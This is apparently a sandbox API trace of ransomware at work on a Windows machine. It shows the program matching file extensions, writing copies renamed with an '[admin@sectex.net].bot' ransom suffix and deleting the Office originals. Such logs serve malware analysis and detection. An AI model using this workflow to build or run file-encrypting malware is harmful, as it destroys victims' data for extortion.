	[0157.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.320] lstrlenW (lpString=".jpg") returned 4
	[0157.320] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0157.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.321] lstrlenW (lpString=".doc") returned 4
	[0157.321] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0157.321] lstrlenW (lpString=".docx") returned 5
	[0157.321] lstrcmpiW (lpString1=".docx", lpString2="3.BDR") returned -1
	[0157.321] lstrlenW (lpString=".pdf") returned 4
	[0157.321] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0157.321] lstrlenW (lpString=".xls") returned 4
	[0157.321] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0157.321] lstrlenW (lpString=".xlsx") returned 5
	[0157.321] lstrcmpiW (lpString1=".xlsx", lpString2="3.BDR") returned -1
	[0157.321] lstrlenW (lpString=".ppt") returned 4
	[0157.321] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0157.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.321] lstrlenW (lpString=".zip") returned 4
	[0157.321] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0157.321] lstrlenW (lpString=".rar") returned 4
	[0157.321] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0157.321] lstrlenW (lpString=".bz2") returned 4
	[0157.321] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0157.321] lstrlenW (lpString=".7z") returned 3
	[0157.321] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0157.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.321] lstrlenW (lpString=".dbf") returned 4
	[0157.321] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0157.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.321] lstrlenW (lpString=".1cd") returned 4
	[0157.321] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0157.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART3.BDR") returned 61
	[0157.321] lstrlenW (lpString=".jpg") returned 4
	[0157.322] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0157.322] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0157.322] lstrlenW (lpString="DELIMR.FAE") returned 10
	[0157.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\delimr.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0157.559] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=10144) returned 1
	[0157.559] CloseHandle (hObject=0x3f0) returned 1
	[0157.560] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\delimr.fae")) returned 0x20
	[0157.560] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\delimr.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\delimr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0157.560] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.560] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\delimr.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0157.675] GetLastError () returned 0x0
	[0157.675] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x27a0, lpOverlapped=0x0) returned 1
	[0157.685] WriteFile (in: hFile=0x3c4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x27b0, lpOverlapped=0x0) returned 1
	[0157.686] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0157.686] WriteFile (in: hFile=0x3c4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0157.686] SetEndOfFile (hFile=0x3c4) returned 1
	[0157.686] CloseHandle (hObject=0x3c4) returned 1
	[0157.686] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.686] SetEndOfFile (hFile=0x3f0) returned 1
	[0157.688] CloseHandle (hObject=0x3f0) returned 1
	[0157.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0157.689] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\delimr.fae")) returned 1
	[0157.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.689] lstrlenW (lpString=".doc") returned 4
	[0157.690] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0157.690] lstrlenW (lpString=".docx") returned 5
	[0157.690] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0157.690] lstrlenW (lpString=".pdf") returned 4
	[0157.690] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0157.690] lstrlenW (lpString=".xls") returned 4
	[0157.690] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0157.690] lstrlenW (lpString=".xlsx") returned 5
	[0157.690] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0157.690] lstrlenW (lpString=".ppt") returned 4
	[0157.690] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0157.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.690] lstrlenW (lpString=".zip") returned 4
	[0157.690] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0157.690] lstrlenW (lpString=".rar") returned 4
	[0157.690] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0157.690] lstrlenW (lpString=".bz2") returned 4
	[0157.690] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0157.690] lstrlenW (lpString=".7z") returned 3
	[0157.690] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0157.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.690] lstrlenW (lpString=".dbf") returned 4
	[0157.690] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0157.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.690] lstrlenW (lpString=".1cd") returned 4
	[0157.690] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0157.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.690] lstrlenW (lpString=".jpg") returned 4
	[0157.690] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0157.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.691] lstrlenW (lpString=".doc") returned 4
	[0157.691] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0157.691] lstrlenW (lpString=".docx") returned 5
	[0157.691] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0157.691] lstrlenW (lpString=".pdf") returned 4
	[0157.691] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0157.691] lstrlenW (lpString=".xls") returned 4
	[0157.691] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0157.691] lstrlenW (lpString=".xlsx") returned 5
	[0157.691] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0157.691] lstrlenW (lpString=".ppt") returned 4
	[0157.691] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0157.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.691] lstrlenW (lpString=".zip") returned 4
	[0157.691] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0157.691] lstrlenW (lpString=".rar") returned 4
	[0157.691] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0157.691] lstrlenW (lpString=".bz2") returned 4
	[0157.691] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0157.691] lstrlenW (lpString=".7z") returned 3
	[0157.691] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0157.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.691] lstrlenW (lpString=".dbf") returned 4
	[0157.691] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0157.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.691] lstrlenW (lpString=".1cd") returned 4
	[0157.691] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0157.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\DELIMR.FAE") returned 66
	[0157.691] lstrlenW (lpString=".jpg") returned 4
	[0157.691] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0157.692] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0157.692] lstrlenW (lpString="OLADDR.FAE") returned 10
	[0157.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oladdr.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0157.695] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=13744) returned 1
	[0157.695] CloseHandle (hObject=0x3f0) returned 1
	[0157.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oladdr.fae")) returned 0x20
	[0157.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oladdr.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oladdr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0157.695] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.695] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oladdr.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0157.696] GetLastError () returned 0x0
	[0157.696] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x35b0, lpOverlapped=0x0) returned 1
	[0157.701] WriteFile (in: hFile=0x3c4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x35c0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x35c0, lpOverlapped=0x0) returned 1
	[0157.702] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0157.702] WriteFile (in: hFile=0x3c4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0157.702] SetEndOfFile (hFile=0x3c4) returned 1
	[0157.702] CloseHandle (hObject=0x3c4) returned 1
	[0157.702] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.702] SetEndOfFile (hFile=0x3f0) returned 1
	[0157.704] CloseHandle (hObject=0x3f0) returned 1
	[0157.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0157.705] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oladdr.fae")) returned 1
	[0157.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.705] lstrlenW (lpString=".doc") returned 4
	[0157.705] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0157.705] lstrlenW (lpString=".docx") returned 5
	[0157.705] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0157.705] lstrlenW (lpString=".pdf") returned 4
	[0157.705] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0157.705] lstrlenW (lpString=".xls") returned 4
	[0157.705] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0157.705] lstrlenW (lpString=".xlsx") returned 5
	[0157.705] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0157.705] lstrlenW (lpString=".ppt") returned 4
	[0157.705] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0157.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.706] lstrlenW (lpString=".zip") returned 4
	[0157.706] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0157.706] lstrlenW (lpString=".rar") returned 4
	[0157.706] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0157.706] lstrlenW (lpString=".bz2") returned 4
	[0157.706] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0157.706] lstrlenW (lpString=".7z") returned 3
	[0157.706] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0157.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.706] lstrlenW (lpString=".dbf") returned 4
	[0157.706] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0157.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.706] lstrlenW (lpString=".1cd") returned 4
	[0157.706] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0157.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.706] lstrlenW (lpString=".jpg") returned 4
	[0157.706] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0157.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.706] lstrlenW (lpString=".doc") returned 4
	[0157.706] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0157.706] lstrlenW (lpString=".docx") returned 5
	[0157.706] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0157.706] lstrlenW (lpString=".pdf") returned 4
	[0157.706] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0157.706] lstrlenW (lpString=".xls") returned 4
	[0157.706] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0157.706] lstrlenW (lpString=".xlsx") returned 5
	[0157.706] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0157.706] lstrlenW (lpString=".ppt") returned 4
	[0157.706] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0157.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.707] lstrlenW (lpString=".zip") returned 4
	[0157.707] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0157.707] lstrlenW (lpString=".rar") returned 4
	[0157.707] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0157.707] lstrlenW (lpString=".bz2") returned 4
	[0157.707] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0157.707] lstrlenW (lpString=".7z") returned 3
	[0157.707] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0157.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.707] lstrlenW (lpString=".dbf") returned 4
	[0157.707] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0157.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.707] lstrlenW (lpString=".1cd") returned 4
	[0157.707] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0157.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLADDR.FAE") returned 66
	[0157.707] lstrlenW (lpString=".jpg") returned 4
	[0157.707] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0157.707] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0157.707] lstrlenW (lpString="OLAPPTR.FAE") returned 11
	[0157.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olapptr.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0157.708] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=11704) returned 1
	[0157.708] CloseHandle (hObject=0x3f0) returned 1
	[0157.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olapptr.fae")) returned 0x20
	[0157.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olapptr.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olapptr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0157.709] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.709] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olapptr.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0157.712] GetLastError () returned 0x0
	[0157.712] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x2db8, lpOverlapped=0x0) returned 1
	[0157.714] WriteFile (in: hFile=0x3e8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x2dc0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x2dc0, lpOverlapped=0x0) returned 1
	[0157.715] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0157.715] WriteFile (in: hFile=0x3e8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0157.715] SetEndOfFile (hFile=0x3e8) returned 1
	[0157.715] CloseHandle (hObject=0x3e8) returned 1
	[0157.715] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.715] SetEndOfFile (hFile=0x3f0) returned 1
	[0157.717] CloseHandle (hObject=0x3f0) returned 1
	[0157.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0157.718] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olapptr.fae")) returned 1
	[0157.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.718] lstrlenW (lpString=".doc") returned 4
	[0157.718] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0157.718] lstrlenW (lpString=".docx") returned 5
	[0157.718] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0157.718] lstrlenW (lpString=".pdf") returned 4
	[0157.719] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0157.719] lstrlenW (lpString=".xls") returned 4
	[0157.719] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0157.719] lstrlenW (lpString=".xlsx") returned 5
	[0157.719] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0157.719] lstrlenW (lpString=".ppt") returned 4
	[0157.719] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0157.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.719] lstrlenW (lpString=".zip") returned 4
	[0157.719] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0157.719] lstrlenW (lpString=".rar") returned 4
	[0157.719] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0157.719] lstrlenW (lpString=".bz2") returned 4
	[0157.719] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0157.719] lstrlenW (lpString=".7z") returned 3
	[0157.719] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0157.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.719] lstrlenW (lpString=".dbf") returned 4
	[0157.719] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0157.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.719] lstrlenW (lpString=".1cd") returned 4
	[0157.719] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0157.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.719] lstrlenW (lpString=".jpg") returned 4
